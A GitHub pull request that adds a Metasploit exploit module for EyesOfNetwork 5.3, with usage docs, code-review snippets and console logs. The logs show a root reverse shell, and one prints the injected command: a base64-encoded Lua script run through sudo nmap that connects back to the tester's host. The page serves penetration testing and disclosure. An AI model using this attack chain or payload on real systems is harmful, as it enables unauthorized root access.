Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add module and docs for EyesOfNetwork 5.3 RCE (CVE-2020-8654, 8655, 8656, 8657) #12959

Merged
merged 6 commits into from Mar 2, 2020

Conversation

@kalba-security
Copy link
Contributor

kalba-security commented Feb 19, 2020

About

This change adds a new module to /modules/exploits/linux/http/ that exploits multiple vulnerabilities in EyesOfNetwork version 5.3 and prior in order to execute arbitrary commands as root. The change also adds documentation for this module. The module is based on this exploit: https://www.exploit-db.com/exploits/48025.

Vulnerable System

EyesOfNetwork version 5.3 and prior.

Verification Steps

  1. Install the module as usual
  2. Start msfconsole
  3. Do: use exploit/linux/http/eyesofnetwork_autodiscovery_rce
  4. Do: set RHOSTS [IP]
  5. Do: set payload [payload]
  6. Do: set LHOST [IP]
  7. Do: exploit

Options

  1. Proxies. This option is not set by default.
  2. RHOSTS. To use: set RHOSTS [IP]
  3. RPORT. The default setting is 443. To use: set RPORT [PORT]
  4. SERVER_ADDR. This option is not set by default.
  5. SSL. The default setting is true, because HTTPS is required for the module to work.
  6. TARGETURI. This option is the base path. / by default.
  7. VHOST. This option is not set by default.

Payload Options

  1. LHOST. To use: set LHOST [IP]
  2. LPORT. The default setting is 4444. To use: set LPORT [PORT]

Scenarios

msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options

Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.1.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        443              yes       The target port (TCP)
   SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)
   SSL          true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Base path to EyesOfNetwork
   VHOST                         no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Using generated API key: a496fb1025187066dc1e4e56197bd2db1a23c565f42b98df8ff55698442b6476
[+] Authenticated as user kY7Qn1gr8L
[*] Sending payload (428 bytes) ...
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:45897) at 2020-02-19 15:30:31 +0100

id
uid=0(root) gid=0(root) groups=0(root)
@kalba-security

This comment has been minimized.

Copy link
Contributor Author

kalba-security commented Feb 19, 2020

This is based on the draft module by @bcoles. The vulnerable app can be downloaded from https://www.eyesofnetwork.com/en

@h4knet

This comment has been minimized.

Copy link

h4knet commented Feb 21, 2020

Hello, I've tested it and it work on my machine. Both with the API computation and the SQLi Injection. Thank's for the work accomplished :)

Copy link
Contributor

space-r7 left a comment

Hey @kalba-security, thank you for submitting the module!

## Options

1. `Proxies`. This option is not set by default.
2. `RHOSTS`. To use: `set RHOSTS [IP]`
3. `RPORT`. The default setting is `443`. To use: `set RPORT [PORT]`
4. `SERVER_ADDR`. This option is not set by default.
5. `SSL`. The default setting is `true`, because HTTPS is required for the module to work.
6. `TARGETURI`. This option is the base path. `/` by default.
7. `VHOST`. This option is not set by default.

## Payload Options
1. `LHOST`. To use: `set LHOST [IP]`
2. `LPORT`. The default setting is `4444`. To use: `set LPORT [PORT]`

Comment on lines 20 to 33

This comment has been minimized.

Copy link
@space-r7

space-r7 Feb 21, 2020

Contributor

We typically don't need information about the more common options like RHOSTS, RPORT, SSL, TARGETURI, etc. Most of these options can be removed unless they're unique to this specific module.

api_res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "/eonapi/getApiKey"),
'method' => 'GET',
'User-Agent' => 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37',

This comment has been minimized.

Copy link
@space-r7

space-r7 Feb 21, 2020

Contributor

Is this required? If not, you can remove it since a default UserAgent will be sent in the request.

This comment has been minimized.

Copy link
@kalba-security

kalba-security Feb 23, 2020

Author Contributor

Nope, I forgot to remove this one, it will work with a default UserAgent as well.

return
end

unless res.code == 200 && res.get_json_document()['result']['description'].include?('SUCCESS')

This comment has been minimized.

Copy link
@space-r7

space-r7 Feb 21, 2020

Contributor

Since res.get_json_document() is used twice here, I'd suggest making that a variable and performing a few checks on it first before accessing its data. For example, res.get_json_document()['result'] could return nil and cause an error when you further attempt to access its contents.

>> res.get_json_document()['result']
=> nil
>> res.get_json_document()['result']['description']
Traceback (most recent call last):
       13: from ./msfconsole:49:in `<main>'
       12: from /Users/space/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
       11: from /Users/space/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
       10: from /Users/space/metasploit-framework/lib/rex/ui/text/shell.rb:151:in `run'
        9: from /Users/space/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
        8: from /Users/space/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
        7: from /Users/space/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
        6: from /Users/space/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
        5: from /Users/space/metasploit-framework/lib/msf/ui/console/command_dispatcher/developer.rb:114:in `cmd_irb'
        4: from /Users/space/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `run'
        3: from /Users/space/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `catch'
        2: from /Users/space/metasploit-framework/lib/rex/ui/text/irb_shell.rb:53:in `block in run'
        1: from (irb):12
NoMethodError (undefined method `[]' for nil:NilClass)
'request' => 'autodiscover',
'job_name' => 'Internal discovery',
'job_description' => 'Internal EON discovery procedure.',
'nmap_binary' => '/usr/bin/nmap',

This comment has been minimized.

Copy link
@space-r7

space-r7 Feb 21, 2020

Contributor

Are there other possible paths that nmap is installed in?

This comment has been minimized.

Copy link
@kalba-security

kalba-security Feb 23, 2020

Author Contributor

Not that I know of. But I think we could rule out this possibility by changing the value of "cmd" to something like cmd = "a=$(which nmap);echo #{nse} | base64 -d > #{nse_path};sudo ${a} localhost -sn -script #{nse_path};rm #{nse_path}" . I could test this tomorrow.

This comment has been minimized.

Copy link
@bcoles

bcoles Feb 23, 2020

Contributor

The path to nmap is used twice. This is why it was defined in a method in the original exploit:

  def nmap_path
    '/usr/bin/nmap'
  end

One instance where this path is used is prior to executing commands, preventing the use of which. Also, which can be problematic.

Although the source code is available on GitHub, it's generally distributed as an ISO, in which case the binary will always be in the same location.

sqli = false
verify_api = create_eon_user @username, @password, sqli
unless verify_api == "success"
if verify_api == "try_sqli"
@api_key = sqli_to_api_key
unless @api_key
fail_with Failure::NoAccess, 'Failed to obtain valid API key'
end
sqli = true
print_status("Using API key obtained via SQL injection: #{@api_key}")
verify_api = create_eon_user @username, @password, sqli
else
fail_with Failure::NoAccess, 'Failed to obtain valid API key'
end
end
Comment on lines +301 to +315

This comment has been minimized.

Copy link
@bcoles

bcoles Feb 23, 2020

Contributor

The conditional blocks here and in the create_eon_user method are an unreadable mess.

The code to obtain a valid API key should be abstracted out of these methods.

Both techniques to add a user require a valid API key. How about adding a method to check if the API key is valid and setting @api_key appropriately ?

@kalba-security

This comment has been minimized.

Copy link
Contributor Author

kalba-security commented Feb 27, 2020

@space-r7 please let me know if you can use my help with incorporating the suggestions above. I am still kind of new to this so it isn't fully clear to me to what extent you want me involved at this point, but I am willing to assist wherever I can.

@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Feb 27, 2020

@space-r7 please let me know if you can use my help with incorporating the suggestions above. I am still kind of new to this so it isn't fully clear to me to what extent you want me involved at this point, but I am willing to assist wherever I can.

If you have the bandwidth to make the suggested changes currently, then feel free to make them and push them up to your branch. If you're short on time, then I am more than happy to take over and make the suggested changes. Just let me know. Thanks!

@kalba-security

This comment has been minimized.

Copy link
Contributor Author

kalba-security commented Feb 27, 2020

Thanks for the response. I could commit all the straightforward changes tomorrow, but I probably won't have time for any refactoring until next week. I could have a crack at it then, but you would probably do a way better job if you have time for it lol

@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Feb 27, 2020

Thanks for the response. I could commit all the straightforward changes tomorrow, but I probably won't have time for any refactoring until next week. I could have a crack at it then, but you would probably do a way better job if you have time for it lol

No problem! Great! I can take a look at the remaining changes for you, no problem!

kalba-security and others added 3 commits Feb 28, 2020
Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
@kalba-security

This comment has been minimized.

Copy link
Contributor Author

kalba-security commented Feb 28, 2020

Thanks for the response. I could commit all the straightforward changes tomorrow, but I probably won't have time for any refactoring until next week. I could have a crack at it then, but you would probably do a way better job if you have time for it lol

No problem! Great! I can take a look at the remaining changes for you, no problem!

Okay so I've incorporated all the changes except your suggestion to run checks on res.get_json_document() in the create_eon_user method and bcoles' suggestions for adding a method to check the API key since these issues overlap and it would make sense to tackle them together, which I don't have time for. So it would be great if you could take a look at this when you have time :)

space-r7 added a commit that referenced this pull request Mar 2, 2020
@space-r7 space-r7 merged commit 755a776 into rapid7:master Mar 2, 2020
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Mar 2, 2020

Tested again after making the remaining changes:

msf5 > use exploit/linux/http/eyesofnetwork_autodiscovery_rce
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > set rhosts 192.168.37.159
rhosts => 192.168.37.159
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > set verbose true
verbose => true
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > check

[*] Running check
[*] 192.168.37.159:443 - The target appears to be vulnerable. Target is EyesOfNetwork with API version 2.4.2.
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Running check
[*] Using generated API key: 3970ca4b06a0ce6c4c2fd5ee84c9ae5755cfba97788ebef14d8306e8933680bd
[*] Creating user 8BLXh9D1KU ...
[*] Authenticating as 8BLXh9D1KU ...
[+] Authenticated as user 8BLXh9D1KU
[*] Sending payload (427 bytes) ...
[*] Creating AutoDiscovery job: ;echo bG9jYWwgb3M9cmVxdWlyZSAib3MiIGhvc3RydWxlPWZ1bmN0aW9uKGhvc3QpIG9zLmV4ZWN1dGUoImF3ayAnQkVHSU57cz1cIi9pbmV0L3RjcC8wLzE5Mi4xNjguMzcuMS80NDQ0XCI7d2hpbGUoMSl7ZG97c3wmZ2V0bGluZSBjO2lmKGMpe3doaWxlKChjfCZnZXRsaW5lKT4wKXByaW50ICQwfCZzO2Nsb3NlKGMpfX13aGlsZShjIT1cImV4aXRcIik7Y2xvc2Uocyl9fSciKSBlbmQgYWN0aW9uPWZ1bmN0aW9uKCkgZW5k | base64 -d > /tmp/.j2SSiMgJb;sudo /usr/bin/nmap localhost -sn -script /tmp/.j2SSiMgJb;rm /tmp/.j2SSiMgJb #
[*] Removing AutoDiscovery job 3 ...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.159:38089) at 2020-03-02 15:03:54 -0600
[*] Removing user 8BLXh9D1KU ...

whoami
root
uname -a
Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Mar 2, 2020

Release Notes

This adds an exploit module for various vulnerabilities in EyesOfNetwork v5.3. First, an admin account is created either by generating an access token via a hardcoded API key or by obtaining it via a SQL injection vulnerability. After logging in as the newly created user, a command injection vulnerability is exploited to gain code execution with root privileges.

@kalba-security kalba-security deleted the kalba-security:eyesofnetwork_autodiscovery_rce branch Mar 6, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

6 participants
You can’t perform that action at this time.